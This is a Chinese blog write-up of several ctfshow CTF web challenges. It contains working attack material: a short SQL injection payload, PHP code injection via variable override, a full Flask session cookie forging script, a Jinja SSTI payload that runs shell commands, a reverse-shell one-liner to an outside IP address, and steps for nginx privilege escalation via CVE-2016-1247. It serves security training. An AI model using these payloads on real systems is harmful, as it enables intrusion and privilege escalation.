ctfshow-内部赛

已于 2022-03-09 19:52:20 修改
阅读量4.5k 收藏
点赞数
文章标签: python 开发语言
于 2022-03-09 19:51:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blowed/article/details/123385584
版权

登录就有flag签退蓝瘦出题人不想跟你说话.jpg

登录就有flag

经过一番固定的注入尝试发现 1:长度限制为5 2:存在过滤且过滤的字符会有回显 能留下来的字符很少这里列出 # ' ^ = > < . ,

在排除一下 =><可以只留等于号, 逗号和点号暂时没想出来怎么利用,所以可用的字符还有# ' ^ =

号可以用于闭合,井号可以用于注释,^进行异或运算,等号就是判等,这里需要利用sql的一个点“mysql弱类型转换” 空异或0会查到所有非数字开头的记录,转换一下还有好几种结果:

payload:

'^0#   '^''#    

签退

变量覆盖

payload:

?S=a;system("ls");

可知 eval里面的内容为 ("a;system('ls')")

蓝瘦

flask session 加解密

""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'
​
# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast
​
# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod
​
# Lib for argument parsing
import argparse
​
# external Imports
from flask.sessions import SecureCookieSessionInterface
​
class MockApp(object):
​
    def __init__(self, secret_key):
        self.secret_key = secret_key
​
​
if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)
​
                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)
​
                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e
​
​
        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value
​
                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]
​
                    data = payload.split(".")[0]
​
                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)
​
                    return data
                else:
                    app = MockApp(secret_key)
​
                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)
​
                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)
​
                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)
​
                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e
​
​
        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value
​
                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]
​
                    data = payload.split(".")[0]
​
                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)
​
                    return data
                else:
                    app = MockApp(secret_key)
​
                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)
​
                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
​
​
if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")
​
    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
​
    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)
​
    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)
​
    ## get args
    args = parser.parse_args()
​
    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))
​
​
解密:python flask_session_manager.py decode -c -s  # -c是flask cookie里的session值 -s参数是SECRET_KEY
加密:python flask_session_manager.py encode -s -t # -s参数是SECRET_KEY -t参数是session的参照格式,也就是session解密后的格式

 剩下的就是ssti了说flag在内存,那么查看环境变量:Linux查看环境变量使用env命令显示所有的环境变量

payload:

?ctfshow={{config.__class__.__init__.__globals__['os'].popen('env').read()}}

出题人不想跟你说话.jpg

根据图片 连接 密码为 cai

权限不够 不能读flag

根据提示知道要提权 ,提示还说漏洞俩分钟触发一次,猜测可能有定时任务可以利用

cat/etc/crontab

根据这个任务 在网上各种搜索 发现

[nginx权限提升]  https://blog.knownsec.com/2016/11/nginx-exploit-deb-root-privesc-cve-2016-1247/ 

查看版本在此列

 

1.反弹shell

攻击机:  netcat -lvvp 2333
受害机: bash -i >& /dev/tcp/82.156.168.16/2333 0>&1

2.下载对应POC上传到服务器(nginx.sh)

注意:创建POC需要在linux系统中创建,否则运行时会报错“/bin/bash^M: bad interpreter: No such file or directory”,这是由于脚本文件的格式不同,linux却是只能执行格式为unix格式的脚本。如果在windows下创建则会变成dos格式。

通过cat -A filename查看格式,dos格式的文件行尾为^M$ ,unix格式的文件行尾为$。 或者可以直接改 vi模式打开 :set ff=unix

上传后运行POC(一定在自己的html文件目录下)

chmod +x nginx.sh
./nginx.sh
./nginx.sh /var/log/nginx/error.log

接着等待漏洞触发即可

Fnylad
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1605
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
CTF秀--内部
m0_59022585的博客
07-11 192
官方WP:暂无。
ctfshow——SSRF
最新发布
qq_55202378的博客
05-02 961
(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
ctfshow-内部-签到
XYH_233的博客
03-30 1282
ctfshow-内部-签到
CTF训练之路2--ctfshow内部
unexpectedthing的博客
11-07 6647
文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余签退 签到 一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入题。 所谓二次注入,就是再register中构造sql语句,然后登录login来触发。 找到羽师傅的脚本 import requests import re url_register = "http://7b093e85-e6d5-4784-adab-49ba20992eda.challenge.ctf.show/register.
ctf内部
weixin_52127082的博客
03-23 1310
MISC 看看你的刷新键是什么? 下载图片和工具,在csdn搜索博客F5图片隐写,按上面的步骤就可得到结果: 然后会出现output.txt文件,flag就在里面。 字节中遇见你 下载好为一个图片,用010Editor打开,搜索flag,有两个,一个对的,一个错的。 签到 下载拉到桌面上,右键属性里有答案。 Easy 下按在用记事本打开文本是 W^T[p[XkrYH-pa|,对照ASCII码表,前4个跟flag比,找到变化的规律,算出结果。 看你认真不认真 脑洞题,结果在这里面。 RE re
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow-web内部
2202_75812594的博客
04-20 950
函数来进行绕过(这里用两个hex()函数,只用一个会出现字符的情况,比如'o',笔者亲测),并且对我们的用户名进行了一个长度判断(>10则取前10位,所有我们可以用。这里的password并不会被注释掉,因为源代码换行符的存在,但原本的username会被通过内联注释掉方式注释掉(如下图)。, 其实可以发现,在登录页面的过滤远比注册页面多得多,明显的强过滤,所有我们完全可以利用注册页面来。这是我们唯一能看的两句sql语句,通过第二句发现,我们可以在。函数,检测我们的用户名是不是数字,这里我们可以利用。
CTFSHOW 内部 杂项6_給我上一杯82年的雪
羽的博客
03-29 700
根据酒的名称找酒庄的位置然后标记出来,从给的图片上可以找到各种酒的类型,然后把类型相同的连起来,发现就一个貌似是个字母,结果确实是。 ...
CTFSHOW内部web5_登陆就有flag
羽的博客
03-30 2249
经过一番固定的注入尝试发现 1:长度限制为5 2:存在过滤且过滤的字符会有回显 能留下来的字符很少这里列出 # ' ^ = > < . , 在排除一下 =><可以只留等于号, 逗号和点号暂时没想出来怎么利用,所以可用的字符还有 # ' ^ = 分号可以用于闭合,井号可以用于注释,^进行异或运算,等号就是判等,这里需要利用sql的一个点“mysql弱类型转换” 空异或0会...
ctfshow-内部-签到_ctfshow内部签到,字节跳动+腾讯+华为+小米+阿里面试题分享
2401_84164527的博客
04-09 529
我们需要用到两处地方,即两次对数据库操作的地方,一处用于插入payload,在。代码审懂了,但是脚本编写能力确实还欠佳,参考了一下别的师傅的代码,做了一点修改,直接可以跑出答案。构造出来的SQL:在username处找flag,至于爆表爆字段改一改就行了,(img-v33wYdhf-1712651567314)]进行了过滤,只能显示数字,但是没关系,这里通过hex编码绕过,X:vip204888 (备注网络安全获取)**,一处用于执行payload,在。,还需要注意一点,在。
内部 签到-ctf.show
yuqie的博客
06-14 380
这结果可是跑了好几个网站才出来,观察一下上面的图案,是十二星座,网上科普一下。的字符编码(xx等于该字符在字符集表里面的编码的16进制数字)。天秤座 ♎ U+264E(9月23日 - 10月23日)金牛座 ♉ U+2649(4月21日 - 5月21日)双子座 ♊ U+264A(5月22日 - 6月21日)巨蟹座 ♋ U+264B(6月22日 - 7月22日)狮子座 ♌ U+264C(7月23日 - 8月22日)处女座 ♍ U+264D(8月23日 - 9月22日)
ctfshow-CRYPTO-内部-签到
HAI_WD的博客
07-04 481
在线转换一下16进制得到3636364336313637374234393546344334463536343535463333333634343744。说实话这道题,正常人很少能绕这么多下绕过来,可能到星座那就无了,只能说脑洞大于思路大于技术。按照对应的顺序排一个序,这里看到2648是白羊,也就是第一个,那么做一下简单的转换。首先看到字符串是一个base64,转换一下。通过base家族爆破一下,最终拿到flag。然后判断一下,使用escape进行解码。看一下base92,得到一个字符串。
ctfshow-CRYPTO-内部-密码2
HAI_WD的博客
07-04 264
这道题就相对而言比较简单了,将ctf当做一个整体为.,show为-,那么就可以得到。
CTFSHOW内部 web03_出题人不想跟你说话.jpg
羽的博客
03-30 1552
0x01 根据网站里面隐晦的提示,猜测可能需要连菜刀,而且图片上有个cai可能是连接的密码。 果然如此,那我们直接找flag吧,发现flag在根目录下,但是没有权限打开。那就得提权了 0x02 根据提示说漏洞每2分钟触发一次,猜测可能有定时任务可利用,cat /etc/crontab 这个定时任务很可疑呀 一分钟一次,在网上经过各种搜索发现了nginx提权漏洞CVE-2016-1247,大家有...
ctfshow的pwn2
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag文件。 2. 使用cat命令打开flag文件,成功拿到flag。 3. 接下来,构造exp,引用中给出了一个使用pwntools库构造的exp示例。其中,使用remote函数连接到pwn.challenge.ctf.show的28025端口。 4. 设置bk变量的值为0x804850f。 5. 构造payload,其中包含了"a"*(0x9 0x4)和p32(bk)。 6. 使用sendline函数发送payload。 7. 使用interactive函数与远程主机进行交互。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值